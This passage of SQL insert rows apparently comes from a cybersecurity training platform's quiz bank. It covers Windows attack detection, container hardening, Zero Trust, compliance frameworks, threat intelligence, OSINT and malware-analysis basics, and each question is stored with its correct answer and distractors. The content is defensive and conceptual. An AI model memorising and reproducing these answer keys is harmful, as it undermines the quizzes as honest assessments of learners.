(6294, 412, 'Which Windows event logs DCSync activity?', 3, 'Security Event 4662 (replication rights)', 0, 'AD', '2025-12-27 02:26:00', '[\"Sysmon 1\", \"Security Event 4662 (replication rights)\", \"Application log\", \"System log\"]'),
(6295, 413, 'What does PsExec create on the remote host?', 1, 'A service (PSEXESVC)', 0, 'Service', '2025-12-27 02:26:00', '[\"A file only\", \"A service (PSEXESVC)\", \"Nothing\", \"A registry key\"]'),
(6296, 413, 'Which parent-child relationship is suspicious for WMI?', 2, 'WmiPrvSE.exe spawning cmd.exe or powershell.exe', 0, 'Process tree', '2025-12-27 02:26:00', '[\"svchost → notepad\", \"WmiPrvSE.exe spawning cmd.exe or powershell.exe\", \"explorer → chrome\", \"lsass → svchost\"]'),
(6297, 413, 'Windows Event 7045 indicates:', 3, 'A new service was installed', 0, 'Service', '2025-12-27 02:26:00', '[\"Login\", \"A new service was installed\", \"File access\", \"Network connection\"]'),
(6298, 414, 'What indicates DNS tunneling?', 1, 'High query volume, unusually long subdomains', 0, 'DNS', '2025-12-27 02:26:00', '[\"Slow DNS\", \"High query volume, unusually long subdomains\", \"No DNS\", \"Fast DNS\"]'),
(6299, 414, 'Why monitor uploads to cloud storage domains?', 2, 'Attackers exfiltrate to Dropbox, Google Drive, etc.', 0, 'Cloud exfil', '2025-12-27 02:26:00', '[\"It is slow\", \"Attackers exfiltrate to Dropbox, Google Drive, etc.\", \"Cloud is unsafe\", \"For compliance\"]'),
(6300, 414, 'Which HTTP method is commonly used for exfiltration?', 3, 'POST', 0, 'Upload', '2025-12-27 02:26:00', '[\"GET\", \"POST\", \"DELETE\", \"HEAD\"]'),
(6301, 415, 'What does Detection Rate measure?', 1, 'Percentage of executed techniques that were detected', 0, 'Success', '2025-12-27 02:26:00', '[\"Speed\", \"Percentage of executed techniques that were detected\", \"Cost\", \"Size\"]'),
(6302, 415, 'Why use ATT&CK Navigator heatmaps?', 2, 'Visualize detection coverage across techniques', 0, 'Visualization', '2025-12-27 02:26:00', '[\"It is pretty\", \"Visualize detection coverage across techniques\", \"Required by law\", \"For fun\"]'),
(6303, 415, 'How often should Purple Team exercises occur?', 3, 'Regularly (monthly or quarterly)', 0, 'Recurring', '2025-12-27 02:26:00', '[\"Once ever\", \"Regularly (monthly or quarterly)\", \"Never\", \"Only after breaches\"]'),
(6304, 416, 'Which Sysmon event indicates process access to LSASS?', 1, 'Event ID 10', 0, 'Credential', '2025-12-27 02:26:00', '[\"1\", \"Event ID 10\", \"Event ID 11 \", \"Event ID 22\"]'),
(6305, 416, 'PsExec creates what on remote hosts?', 2, 'A service (PSEXESVC)', 0, 'Remote', '2025-12-27 02:26:00', '[\"A file\", \"A service (PSEXESVC)\", \"Nothing\", \"A user\"]'),
(6306, 416, 'DNS tunneling is characterized by:', 3, 'Long subdomains, high query volume', 0, 'DNS', '2025-12-27 02:26:00', '[\"Fast lookups\", \"Long subdomains, high query volume\", \"No queries\", \"Short names\"]'),
(6307, 416, 'Detection Rate formula:', 4, '(Detected / Executed) x 100', 0, 'Metric', '2025-12-27 02:26:00', '[\"Executed / Detected\", \"(Detected / Executed) x 100\", \"Random\", \"None\"]'),
(6308, 416, 'What should happen after deploying new detection?', 5, 'Re-test the technique', 0, 'Validate', '2025-12-27 02:26:00', '[\"Nothing\", \"Re-test the technique\", \"Delete old alerts\", \"Wait\"]'),
(6309, 416, 'What is Time to Detect (TTD)?', 6, 'Time between execution and alert', 0, 'Speed', '2025-12-27 02:26:00', '[\"Time to delete\", \"Time between execution and alert\", \"Time to report\", \"Time to lunch\"]'),
(6310, 421, 'How does container isolation differ from VMs?', 1, 'Containers share the host kernel; VMs have full kernel isolation', 0, 'Kernel', '2025-12-27 02:27:22', '[\"No difference\", \"Containers share the host kernel; VMs have full kernel isolation\", \"VMs are less secure\", \"Containers are slower\"]'),
(6311, 421, 'What is the risk of container escape?', 2, 'Attacker gains access to the host and other containers', 0, 'Host', '2025-12-27 02:27:22', '[\"Nothing\", \"Attacker gains access to the host and other containers\", \"Container restarts\", \"Performance drop\"]'),
(6312, 421, 'What standard provides Kubernetes hardening guidance?', 3, 'CIS Kubernetes Benchmark', 0, 'CIS', '2025-12-27 02:27:22', '[\"ISO 27001\", \"CIS Kubernetes Benchmark\", \"PCI DSS\", \"HIPAA\"]'),
(6313, 422, 'Why avoid --privileged flag?', 1, 'It gives the container full host capabilities', 0, 'Root', '2025-12-27 02:27:22', '[\"It is slow\", \"It gives the container full host capabilities\", \"It uses more memory\", \"No reason\"]'),
(6314, 422, 'What does --cap-drop=ALL do?', 2, 'Removes all Linux capabilities from the container', 0, 'Least privilege', '2025-12-27 02:27:22', '[\"Adds capabilities\", \"Removes all Linux capabilities from the container\", \"Drops the container\", \"Deletes files\"]'),
(6315, 422, 'Which tool audits Docker against CIS Benchmark?', 3, 'Docker Bench Security', 0, 'Audit', '2025-12-27 02:27:22', '[\"Nmap\", \"Docker Bench Security\", \"Wireshark\", \"Burp Suite\"]'),
(6316, 423, 'What does RBAC control in Kubernetes?', 1, 'Who can do what to which resources', 0, 'Access', '2025-12-27 02:27:22', '[\"Network traffic\", \"Who can do what to which resources\", \"Storage\", \"Logging\"]'),
(6317, 423, 'What is the most restrictive Pod Security Standard?', 2, 'Restricted', 0, 'Strict', '2025-12-27 02:27:22', '[\"Privileged\", \"Baseline\", \"Restricted\", \"None\"]'),
(6318, 423, 'Why use NetworkPolicy?', 3, 'Restrict pod-to-pod communication', 0, 'Segmentation', '2025-12-27 02:27:22', '[\"Faster network\", \"Restrict pod-to-pod communication\", \"More pods\", \"Easier config\"]'),
(6319, 424, 'Which tool scans container images for CVEs?', 1, 'Trivy', 0, 'Scanner', '2025-12-27 02:27:22', '[\"Nmap\", \"Trivy\", \"Wireshark\", \"Metasploit\"]'),
(6320, 424, 'What is Distroless?', 2, 'Container images with no shell or package manager', 0, 'Minimal', '2025-12-27 02:27:22', '[\"A Linux distro\", \"Container images with no shell or package manager\", \"A Docker command\", \"A network tool\"]'),
(6321, 424, 'Why sign container images?', 3, 'Verify provenance and prevent tampering', 0, 'Trust', '2025-12-27 02:27:22', '[\"Faster pulls\", \"Verify provenance and prevent tampering\", \"Smaller size\", \"No reason\"]'),
(6322, 425, 'What does Falco monitor?', 1, 'System calls (syscalls) at runtime', 0, 'Syscall', '2025-12-27 02:27:22', '[\"Network only\", \"System calls (syscalls) at runtime\", \"Files only\", \"Nothing\"]'),
(6323, 425, 'What is a behavioral baseline?', 2, 'Profile of normal container behavior to detect anomalies', 0, 'Normal', '2025-12-27 02:27:22', '[\"A security tool\", \"Profile of normal container behavior to detect anomalies\", \"A network policy\", \"A log file\"]'),
(6324, 425, 'What action can runtime security take on a threat?', 3, 'Kill, pause, or alert on the container', 0, 'Response', '2025-12-27 02:27:22', '[\"Nothing\", \"Kill, pause, or alert on the container\", \"Only log\", \"Restart host\"]'),
(6325, 426, 'Containers share what with the host?', 1, 'The kernel', 0, 'Shared', '2025-12-27 02:27:22', '[\"Nothing\", \"The kernel\", \"The filesystem only\", \"Memory only\"]'),
(6326, 426, 'What does --cap-drop=ALL do?', 2, 'Removes all Linux capabilities', 0, 'Restrict', '2025-12-27 02:27:22', '[\"Adds capabilities\", \"Removes all Linux capabilities\", \"Drops container\", \"Nothing\"]'),
(6327, 426, 'Which tool scans images for CVEs?', 3, 'Trivy', 0, 'Scanner', '2025-12-27 02:27:22', '[\"Nmap\", \"Trivy\", \"Docker\", \"Kubernetes\"]'),
(6328, 426, 'What does RBAC control?', 4, 'Who can access which resources', 0, 'Access', '2025-12-27 02:27:22', '[\"Network\", \"Who can access which resources\", \"Storage\", \"CPU\"]'),
(6329, 426, 'What does Falco monitor?', 5, 'System calls at runtime', 0, 'Runtime', '2025-12-27 02:27:22', '[\"Images\", \"System calls at runtime\", \"Network only\", \"Logs\"]'),
(6330, 426, 'Why use minimal base images?', 6, 'Fewer vulnerabilities, smaller attack surface', 0, 'Less CVEs', '2025-12-27 02:27:22', '[\"Faster\", \"Fewer vulnerabilities, smaller attack surface\", \"Prettier\", \"Cheaper\"]'),
(6331, 431, 'What is the Zero Trust motto?', 1, 'Never trust, always verify', 0, 'Motto', '2025-12-27 02:28:42', '[\"Trust everyone\", \"Never trust, always verify\", \"Trust but verify\", \"Always trust\"]'),
(6332, 431, 'What does \"Assume Breach\" mean?', 2, 'Design security as if attackers are already inside', 0, 'Mindset', '2025-12-27 02:28:42', '[\"Panic\", \"Design security as if attackers are already inside\", \"Give up\", \"Trust more\"]'),
(6333, 431, 'Which NIST document defines Zero Trust Architecture?', 3, 'SP 800-207', 0, 'Standard', '2025-12-27 02:28:42', '[\"SP 800-53\", \"SP 800-207\", \"SP 800-171\", \"SP 800-61\"]'),
(6334, 432, 'In Zero Trust, what replaces network location as the trust boundary?', 1, 'Identity', 0, 'Who', '2025-12-27 02:28:42', '[\"Firewall\", \"Identity\", \"IP address\", \"VPN\"]'),
(6335, 432, 'What is phishing-resistant MFA?', 2, 'FIDO2/WebAuthn hardware keys', 0, 'Strong', '2025-12-27 02:28:42', '[\"SMS codes\", \"FIDO2/WebAuthn hardware keys\", \"Email codes\", \"Security questions\"]'),
(6336, 432, 'Conditional Access decisions are based on:', 3, 'User, device, location, and application risk signals', 0, 'Signals', '2025-12-27 02:28:42', '[\"Random\", \"User, device, location, and application risk signals\", \"Time only\", \"IP only\"]'),
(6337, 433, 'What does microsegmentation prevent?', 1, 'Lateral movement after initial compromise', 0, 'Contain', '2025-12-27 02:28:42', '[\"Authentication\", \"Lateral movement after initial compromise\", \"Logging\", \"Faster network\"]'),
(6338, 433, 'What does ZTNA replace?', 2, 'Traditional VPN', 0, 'VPN', '2025-12-27 02:28:42', '[\"Firewall\", \"Traditional VPN\", \"SIEM\", \"EDR\"]'),
(6339, 433, 'Microsegmentation uses what type of traffic rules?', 3, 'Identity/context-based, not just IP', 0, 'Context', '2025-12-27 02:28:42', '[\"IP only\", \"Identity/context-based, not just IP\", \"Random\", \"None\"]'),
(6340, 434, 'What is continuous verification?', 1, 'Evaluating trust throughout the session, not just at login', 0, 'Ongoing', '2025-12-27 02:28:42', '[\"One-time check\", \"Evaluating trust throughout the session, not just at login\", \"Weekly audit\", \"Never check\"]'),
(6341, 434, 'What is a step-up authentication?', 2, 'Requiring additional verification when risk increases', 0, 'More MFA', '2025-12-27 02:28:42', '[\"Login\", \"Requiring additional verification when risk increases\", \"Password reset\", \"Logout\"]'),
(6342, 434, 'UEBA provides:', 3, 'User and entity behavior analytics', 0, 'Behavior', '2025-12-27 02:28:42', '[\"Firewall rules\", \"User and entity behavior analytics\", \"Encryption\", \"Backups\"]'),
(6343, 435, 'What is the first step in Zero Trust implementation?', 1, 'Identify users, devices, applications, and data', 0, 'Discovery', '2025-12-27 02:28:42', '[\"Deploy firewall\", \"Identify users, devices, applications, and data\", \"Buy tools\", \"Hire staff\"]'),
(6344, 435, 'What are \"Quick Wins\" for Zero Trust?', 2, 'MFA everywhere, conditional access, EDR', 0, 'Easy', '2025-12-27 02:28:42', '[\"Nothing\", \"MFA everywhere, conditional access, EDR\", \"Complete overhaul\", \"Do nothing\"]'),
(6345, 435, 'What should you protect first?', 3, 'Crown jewels (most critical assets)', 0, 'Priority', '2025-12-27 02:28:42', '[\"Everything equally\", \"Crown jewels (most critical assets)\", \"Nothing\", \"Random\"]'),
(6346, 436, 'Zero Trust motto is:', 1, 'Never trust, always verify', 0, 'Motto', '2025-12-27 02:28:42', '[\"Always trust\", \"Never trust, always verify\", \"Trust everyone\", \"Trust but verify\"]'),
(6347, 436, 'In Zero Trust, what is the new perimeter?', 2, 'Identity', 0, 'Boundary', '2025-12-27 02:28:42', '[\"Firewall\", \"Identity\", \"VPN\", \"Router\"]'),
(6348, 436, 'ZTNA replaces:', 3, 'Traditional VPN', 0, 'Access', '2025-12-27 02:28:42', '[\"SIEM\", \"Traditional VPN\", \"EDR\", \"Antivirus\"]'),
(6349, 436, 'Microsegmentation prevents:', 4, 'Lateral movement', 0, 'Contain', '2025-12-27 02:28:42', '[\"Authentication\", \"Lateral movement\", \"Logging\", \"Backup\"]'),
(6350, 436, 'Continuous verification means:', 5, 'Trust is evaluated throughout the session', 0, 'Ongoing', '2025-12-27 02:28:42', '[\"One check\", \"Trust is evaluated throughout the session\", \"Never check\", \"Weekly\"]'),
(6351, 436, 'First step in ZT implementation:', 6, 'Identify users, devices, apps, data', 0, 'Discovery', '2025-12-27 02:28:42', '[\"Buy tools\", \"Identify users, devices, apps, data\", \"Hire\", \"Nothing\"]'),
(6352, 441, 'What is the difference between a framework and compliance?', 1, 'Framework is guidance; compliance is mandatory requirements', 0, 'Difference', '2025-12-27 02:30:07', '[\"Same thing\", \"Framework is guidance; compliance is mandatory requirements\", \"Compliance is optional\", \"Framework is mandatory\"]'),
(6353, 441, 'Why do organizations adopt security frameworks?', 2, 'Common language, best practices, risk management', 0, 'Benefits', '2025-12-27 02:30:07', '[\"For fun\", \"Common language, best practices, risk management\", \"To slow things down\", \"No reason\"]'),
(6354, 441, 'What is an audit?', 3, 'Verification that requirements are met', 0, 'Check', '2025-12-27 02:30:07', '[\"Sales pitch\", \"Verification that requirements are met\", \"Training\", \"Party\"]'),
(6355, 442, 'How many core functions are in NIST CSF?', 1, '5 (Identify, Protect, Detect, Respond, Recover)', 0, 'Five', '2025-12-27 02:30:07', '[\"3\", \"5 (Identify, Protect, Detect, Respond, Recover)\", \"7\", \"10\"]'),
(6356, 442, 'What is a \"Profile\" in NIST CSF?', 2, 'Current or target state of cybersecurity posture', 0, 'State', '2025-12-27 02:30:07', '[\"A social media page\", \"Current or target state of cybersecurity posture\", \"A firewall rule\", \"A user account\"]'),
(6357, 442, 'Which tier represents continuous improvement?', 3, 'Tier 4 - Adaptive', 0, 'Best', '2025-12-27 02:30:07', '[\"Tier 1\", \"Tier 2\", \"Tier 3\", \"Tier 4 - Adaptive\"]'),
(6358, 443, 'What does ISMS stand for?', 1, 'Information Security Management System', 0, 'ISMS', '2025-12-27 02:30:07', '[\"Internal Security Monitoring System\", \"Information Security Management System\", \"Internet Security Module Standard\", \"None\"]'),
(6359, 443, 'How long is ISO 27001 certification valid?', 2, '3 years with annual surveillance audits', 0, 'Three', '2025-12-27 02:30:07', '[\"Forever\", \"3 years with annual surveillance audits\", \"1 year\", \"Monthly\"]'),
(6360, 443, 'What is the purpose of ISO 27002?', 3, 'Guidance on implementing ISO 27001 controls', 0, 'How-to', '2025-12-27 02:30:07', '[\"Certification\", \"Guidance on implementing ISO 27001 controls\", \"Auditing\", \"Pricing\"]'),
(6361, 444, 'Which SOC 2 criterion is always required?', 1, 'Security', 0, 'Core', '2025-12-27 02:30:07', '[\"Availability\", \"Privacy\", \"Security\", \"Integrity\"]'),
(6362, 444, 'What is the difference between SOC 2 Type I and Type II?', 2, 'Type I is point-in-time; Type II tests over a period', 0, 'Duration', '2025-12-27 02:30:07', '[\"Same thing\", \"Type I is point-in-time; Type II tests over a period\", \"Type II is faster\", \"Type I is better\"]'),
(6363, 444, 'Who performs SOC 2 audits?', 3, 'CPA firm (independent auditors)', 0, 'Auditor', '2025-12-27 02:30:07', '[\"Internal team\", \"CPA firm (independent auditors)\", \"Customers\", \"Anyone\"]'),
(6364, 445, 'How many requirements does PCI-DSS have?', 1, '12', 0, 'Twelve', '2025-12-27 02:30:07', '[\"5\", \"10\", \"12\", \"20\"]'),
(6365, 445, 'What does HIPAA protect?', 2, 'PHI (Protected Health Information)', 0, 'Health', '2025-12-27 02:30:07', '[\"Credit cards\", \"PHI (Protected Health Information)\", \"IP addresses\", \"Passwords\"]'),
(6366, 445, 'What is the HIPAA Breach Notification Rule?', 3, 'Report breaches within 60 days', 0, 'Notify', '2025-12-27 02:30:07', '[\"Delete data\", \"Report breaches within 60 days\", \"Hide breach\", \"Nothing\"]'),
(6367, 446, 'NIST CSF has how many core functions?', 1, '5', 0, 'Functions', '2025-12-27 02:30:07', '[\"3\", \"5\", \"7\", \"10\"]'),
(6368, 446, 'ISO 27001 certification lasts:', 2, '3 years', 0, 'Duration', '2025-12-27 02:30:07', '[\"Forever\", \"1 year\", \"3 years\", \"5 years\"]'),
(6369, 446, 'Which SOC 2 criterion is mandatory?', 3, 'Security', 0, 'Required', '2025-12-27 02:30:07', '[\"Privacy\", \"Availability\", \"Security\", \"Integrity\"]'),
(6370, 446, 'PCI-DSS has how many requirements?', 4, '12', 0, 'Count', '2025-12-27 02:30:07', '[\"5\", \"10\", \"12\", \"15\"]'),
(6371, 446, 'HIPAA protects:', 5, 'Protected Health Information (PHI)', 0, 'Health', '2025-12-27 02:30:07', '[\"Credit cards\", \"Protected Health Information (PHI)\", \"Passwords\", \"IP addresses\"]'),
(6372, 446, 'SOC 2 Type II tests controls over:', 6, 'A period of time (6-12 months)', 0, 'Duration', '2025-12-27 02:30:07', '[\"One day\", \"A period of time (6-12 months)\", \"One hour\", \"Never\"]'),
(6976, 765, 'What transforms \"Data\" into \"Intelligence\"?', 1, 'Analysis and Context', 0, 'Data needs processing and analysis to become useful.', '2025-12-29 13:30:44', '[\"Storage\", \"Encryption\", \"Analysis and Context\", \"Transmission\"]'),
(6977, 765, 'Which is an example of \"Intelligence\"?', 2, 'A report advising to block an IP due to active ransomware targeting your industry', 0, 'Intelligence is actionable and relevant.', '2025-12-29 13:30:44', '[\"A log file\", \"A list of IP addresses\", \"A report advising to block an IP due to active ransomware targeting your industry\", \"A spreadsheet of users\"]'),
(6978, 765, 'What is the primary goal of CTI?', 3, 'To support decision making', 0, 'CTI gives stakeholders the info they need to decide.', '2025-12-29 13:30:44', '[\"To hack back\", \"To support decision making\", \"To replace firewalls\", \"To find software bugs\"]'),
(6979, 766, 'Which phase involves setting the goals and requirements?', 1, 'Direction', 0, 'Also called Planning & Direction.', '2025-12-29 13:30:45', '[\"Collection\", \"Direction\", \"Analysis\", \"Feedback\"]'),
(6980, 766, 'Translating a document from Russian to English happens in which phase?', 2, 'Processing', 0, 'Processing converts raw data into a usable format.', '2025-12-29 13:30:45', '[\"Processing\", \"Analysis\", \"Collection\", \"Dissemination\"]'),
(6981, 766, 'Why is Feedback important?', 3, 'It improves future intelligence cycles', 0, 'Feedback ensures the intel met the needs of the consumer.', '2025-12-29 13:30:45', '[\"It saves money\", \"It improves future intelligence cycles\", \"It is required by law\", \"It deletes old data\"]'),
(6982, 767, 'Who is the primary audience for Strategic Intelligence?', 1, 'Executives / CISO', 0, 'High-level decision makers.', '2025-12-29 13:30:45', '[\"SOC Analyst\", \"Penetration Tester\", \"Executives / CISO\", \"Firewall Administrator\"]'),
(6983, 767, 'A list of malicious IP addresses is what type of intelligence?', 2, 'Tactical', 0, 'Tactical intel is used for immediate blocking/detection (IOCs).', '2025-12-29 13:30:45', '[\"Strategic\", \"Operational\", \"Tactical\", \"Technical\"]'),
(6984, 767, 'Information about an adversary\'s habits (TTPs) is...', 3, 'Operational', 0, 'Operational intel explains \"How\" the adversary operates.', '2025-12-29 13:30:45', '[\"Operational\", \"Strategic\", \"Tactical\", \"None\"]'),
(6985, 768, 'What is the \"Pyramid of Value\" order from bottom to top?', 1, 'Data > Information > Intelligence', 0, 'Raw Data -> Processed Info -> Actionable Intel.', '2025-12-29 13:30:45', '[\"Intelligence > Information > Data\", \"Data > Information > Intelligence\", \"Data > Intelligence > Information\", \"None\"]'),
(6986, 768, 'Which phase comes AFTER Collection?', 2, 'Processing', 0, 'After collecting raw data, you must process it.', '2025-12-29 13:30:45', '[\"Direction\", \"Analysis\", \"Processing\", \"Dissemination\"]'),
(6987, 768, 'Tactical Intelligence is best consumed by...', 3, 'Automated Systems / SOC Analysts', 0, 'Machines (SIEM) need lists of IPs/Hashes.', '2025-12-29 13:30:45', '[\"Board of Directors\", \"Automated Systems / SOC Analysts\", \"HR Department\", \"Legal Team\"]'),
(6988, 768, 'Strategic Intelligence focuses on...', 4, 'Long-term risk and trends', 0, 'Big picture for executives.', '2025-12-29 13:30:45', '[\"Long-term risk and trends\", \"Daily alerts\", \"Malware reverse engineering\", \"Network packets\"]'),
(6989, 768, 'What does \"TTP\" stand for?', 5, 'Tactics, Techniques, and Procedures', 0, 'TTPs describe adversary behavior.', '2025-12-29 13:30:45', '[\"Tactics, Techniques, and Procedures\", \"Time To Patch\", \"Threat Tech Protocol\", \"Total Threat Protection\"]'),
(6990, 768, 'In the Intelligence Cycle, what happens during \"Dissemination\"?', 6, 'Intelligence is delivered to consumers', 0, 'Sharing the finished product.', '2025-12-29 13:30:45', '[\"Data is encrypted\", \"Intelligence is delivered to consumers\", \"Data is collected\", \"Requirements are set\"]'),
(6991, 768, 'Why is \"Direction\" the first phase?', 7, 'To define requirements so we know what to look for', 0, 'You need a goal before you start collecting.', '2025-12-29 13:30:45', '[\"To save time\", \"To define requirements so we know what to look for\", \"It is the easiest\", \"Collection is actually first\"]'),
(6992, 768, 'Which is an example of \"Operational\" Intelligence?', 8, 'Report on APT28\'s phishing methods', 0, 'Focuses on Actor behaviors and campaigns.', '2025-12-29 13:30:45', '[\"Hash: abc12345\", \"Global cybercrime cost report\", \"Report on APT28\'s phishing methods\", \"A firewall log\"]'),
(6993, 768, 'What is \"Data\"?', 9, 'Raw, unprocessed facts', 0, 'The base of the pyramid.', '2025-12-29 13:30:45', '[\"Analyzed insight\", \"Raw, unprocessed facts\", \"Contextualized info\", \"A report\"]'),
(6994, 768, 'Feedback helps to...', 10, 'Close the loop and improve the next cycle', 0, 'Continuous improvement.', '2025-12-29 13:30:45', '[\"Close the loop and improve the next cycle\", \"Delete data\", \"Stop the cycle\", \"Archive logs\"]'),
(6995, 769, 'What defines OSINT?', 1, 'Data from publicly available sources', 0, 'Open Source = Public.', '2025-12-29 13:30:45', '[\"Hacking servers\", \"Data from publicly available sources\", \"Spying on private emails\", \"Inside knowledge\"]'),
(6996, 769, 'Which is an example of Passive Reconnaissance?', 2, 'Searching Google for the company name', 0, 'Passive means no direct contact with the target systems.', '2025-12-29 13:30:45', '[\"Port scanning the target\", \"Trying to login\", \"Searching Google for the company name\", \"Sending a phishing email\"]'),
(6997, 769, 'What is a \"Sock Puppet\"?', 3, 'A fake online identity used for research', 0, 'Used to protect your real identity during investigations.', '2025-12-29 13:30:45', '[\"A type of malware\", \"A fake online identity used for research\", \"A VPN provider\", \"A hacking tool\"]'),
(6998, 770, 'Which DNS record shows the IP address of a domain?', 1, 'A', 0, 'A record maps Name to IPv4.', '2025-12-29 13:30:45', '[\"MX\", \"A\", \"TXT\", \"NS\"]'),
(6999, 770, 'What is the best source for finding subdomains via SSL certificates?', 2, 'Certificate Transparency Logs (crt.sh)', 0, 'CT logs serve as a permanent record of all issued certificates.', '2025-12-29 13:30:45', '[\"WHOIS\", \"Certificate Transparency Logs (crt.sh)\", \"Ping\", \"Traceroute\"]'),
(7000, 770, 'Why check MX records?', 3, 'To see who handles their email (e.g., Google vs Microsoft)', 0, 'Mail Exchanger records point to the mail server.', '2025-12-29 13:30:45', '[\"To find the website IP\", \"To see who handles their email (e.g., Google vs Microsoft)\", \"To find employee passwords\", \"To see browsing history\"]'),
(7001, 771, 'What is the danger of interacting with threat actors on Telegram?', 1, 'It ruins OPSEC and can be illegal', 0, 'Passive observation is the rule.', '2025-12-29 13:30:45', '[\"You might make friends\", \"It ruins OPSEC and can be illegal\", \"They will ban you\", \"It costs money\"]'),
(7002, 771, 'What is \"Sherlock\" used for?', 2, 'Username enumeration across platforms', 0, 'Finds where else a username exists.', '2025-12-29 13:30:45', '[\"Password cracking\", \"Username enumeration across platforms\", \"WiFi hacking\", \"Decryption\"]'),
(7003, 771, 'Which platform is best for finding corporate hierarchy and tech stacks?', 3, 'LinkedIn', 0, 'The professional network.', '2025-12-29 13:30:45', '[\"TikTok\", \"LinkedIn\", \"Snapchat\", \"Pinterest\"]'),
(7004, 772, 'Which Google Dork finds PDF files?', 1, 'filetype:pdf', 0, 'Standard Google operator.', '2025-12-29 13:30:45', '[\"filetype:pdf\", \"ext:pdf\", \"search:pdf\", \"pdf:yes\"]'),
(7005, 772, 'What does Shodan crawl?', 2, 'Devices and Ports', 0, 'The search engine for the Internet of Things.', '2025-12-29 13:30:45', '[\"Web pages\", \"Devices and Ports\", \"Social Media\", \"Emails\"]'),
(7006, 772, 'Maltego is primarily used for...', 3, 'Visual Link Analysis', 0, 'Graph-based visualization.', '2025-12-29 13:30:45', '[\"Brute forcing\", \"Visual Link Analysis\", \"Coding\", \"Firewalling\"]'),
(7007, 773, 'What does OPSEC stand for?', 1, 'Operational Security', 0, 'Protecting your operations.', '2025-12-29 13:30:45', '[\"Open Security\", \"Operational Security\", \"Optional Security\", \"Operation Secrecy\"]'),
(7008, 773, 'Passive Reconnaissance involves...', 2, 'No direct contact with the target', 0, 'staying invisible.', '2025-12-29 13:30:45', '[\"Touching the target\", \"No direct contact with the target\", \"Hacking the target\", \"Asking the target questions\"]'),
(7009, 773, 'A \"Sock Puppet\" should...', 3, 'Have a realistic backstory and no link to you', 0, 'To blend in.', '2025-12-29 13:30:45', '[\"Be linked to your real identity\", \"Have a realistic backstory and no link to you\", \"Be an empty profile\", \"Use your work email\"]'),
(7010, 773, 'Which DNS record helps map Email infrastructure?', 4, 'MX', 0, 'Mail Exchanger.', '2025-12-29 13:30:45', '[\"A\", \"MX\", \"CNAME\", \"PTR\"]'),
(7011, 773, 'Which tool archives historical versions of websites?', 5, 'Wayback Machine', 0, 'Archive.org.', '2025-12-29 13:30:45', '[\"Shodan\", \"Wayback Machine\", \"Nmap\", \"Wireshark\"]'),
(7012, 773, 'What is \"Google Dorking\"?', 6, 'Using advanced search operators to find sensitive info', 0, 'Advanced search queries.', '2025-12-29 13:30:45', '[\"Hacking Google servers\", \"Using advanced search operators to find sensitive info\", \"Creating fake Google accounts\", \"Deleting Google results\"]'),
(7013, 773, 'Shodan is best for finding...', 7, 'Webcams, Servers, and IoT devices', 0, 'Internet connected hardware.', '2025-12-29 13:30:45', '[\"People\", \"Webcams, Servers, and IoT devices\", \"News articles\", \"Credit cards\"]'),
(7014, 773, 'Why search \"Certificate Transparency\" logs?', 8, 'To discover subdomains', 0, 'Certs reveal hostnames.', '2025-12-29 13:30:45', '[\"To find passwords\", \"To discover subdomains\", \"To update SSL\", \"To hide traffic\"]'),
(7015, 773, 'What information does WHOIS provide?', 9, 'Domain ownership and registration data', 0, 'Registrar info.', '2025-12-29 13:30:45', '[\"Domain ownership and registration data\", \"Website source code\", \"Database passwords\", \"User traffic\"]'),
(7016, 773, 'Which platform is most useful for corporate reconnaissance (employees, jobs)?', 10, 'LinkedIn', 0, 'Professional context.', '2025-12-29 13:30:45', '[\"Instagram\", \"LinkedIn\", \"Twitch\", \"Snapchat\"]'),
(7017, 774, 'What is Static Analysis?', 1, 'Analyzing the file without execution', 0, 'Looking at the code/properties at rest.', '2025-12-29 13:38:32', '[\"Running the malware\", \"Analyzing the file without execution\", \"Deleting the file\", \"Updating antivirus\"]'),
(7018, 774, 'Which tool captures network traffic during Dynamic Analysis?', 2, 'Wireshark', 0, 'Packet analyzer.', '2025-12-29 13:38:32', '[\"Wireshark\", \"Notepad\", \"Calculator\", \"Zip\"]'),
(7019, 774, 'Why use a Sandbox?', 3, 'To isolate the malware so it doesn\'t infect the host', 0, 'Safety first.', '2025-12-29 13:38:32', '[\"To play with sand\", \"To isolate the malware so it doesn\'t infect the host\", \"To make the computer faster\", \"To encrypt the virus\"]'),
(7020, 775, 'Does changing one byte in a file change its Hash?', 1, 'Yes, completely', 0, 'Avalanche effect.', '2025-12-29 13:38:32', '[\"Yes, completely\", \"No\", \"Only if it is a large file\", \"Maybe\"]'),
(7021, 775, 'What is a \"PDB Path\"?', 2, 'A debug path left by the compiler showing the attacker\'s folder structure', 0, 'Program Database path.', '2025-12-29 13:38:32', '[\"A database path\", \"A debug path left by the compiler showing the attacker\'s folder structure\", \"A public domain\", \"A protocol\"]'),
(7022, 775, 'If you see very few strings in a binary, it is likely...', 3, 'Packed or Obfuscated', 0, 'Packing hides text.', '2025-12-29 13:38:32', '[\"Clean\", \"Packed or Obfuscated\", \"Empty\", \"A text file\"]'),
(7023, 776, 'What is the safest way to analyze a suspicious file initially?', 1, 'Static Analysis', 0, 'No execution = Minimum risk.', '2025-12-29 13:38:32', '[\"Double click it\", \"Static Analysis\", \"Dynamic Analysis on your host\", \"Email it to a friend\"]'),
(7024, 776, 'Which hash algorithm is currently the industry standard for IOCs?', 2, 'SHA256', 0, 'Secure Hash Algorithm 256-bit.', '2025-12-29 13:38:32', '[\"MD5\", \"SHA256\", \"CRC32\", \"ROT13\"]'),
(7025, 776, 'What is a \"Sandbox\"?', 3, 'An isolated environment for safely running malware', 0, 'Isolation is key.', '2025-12-29 13:38:32', '[\"A playground\", \"An isolated environment for safely running malware\", \"A hacking tool\", \"A firewall\"]'),
(7026, 776, 'Dynamic Analysis observes...', 4, 'File behavior at runtime (Registry, Network, File system)', 0, 'Behavioral analysis.', '2025-12-29 13:38:32', '[\"Code structure\", \"File behavior at runtime (Registry, Network, File system)\", \"File size only\", \"Author name\"]'),
(7027, 776, 'If a file is \"Packed\", what must happen before it runs?', 5, 'It must unpack itself in memory', 0, 'Decompression/Decryption.', '2025-12-29 13:38:32', '[\"It must be deleted\", \"It must unpack itself in memory\", \"It must be compiled\", \"It must hold still\"]'),
(7028, 776, 'Which tool extracts readable text from a binary?', 6, 'strings', 0, 'The strings command.', '2025-12-29 13:38:32', '[\"strings\", \"grep\", \"cat\", \"ls\"]'),
(7029, 776, 'What does C2 stand for?', 7, 'Command & Control', 0, 'The server managing the botnet.', '2025-12-29 13:38:32', '[\"Command & Control\", \"Cool & Calm\", \"Computer 2\", \"Cyber Command\"]'),
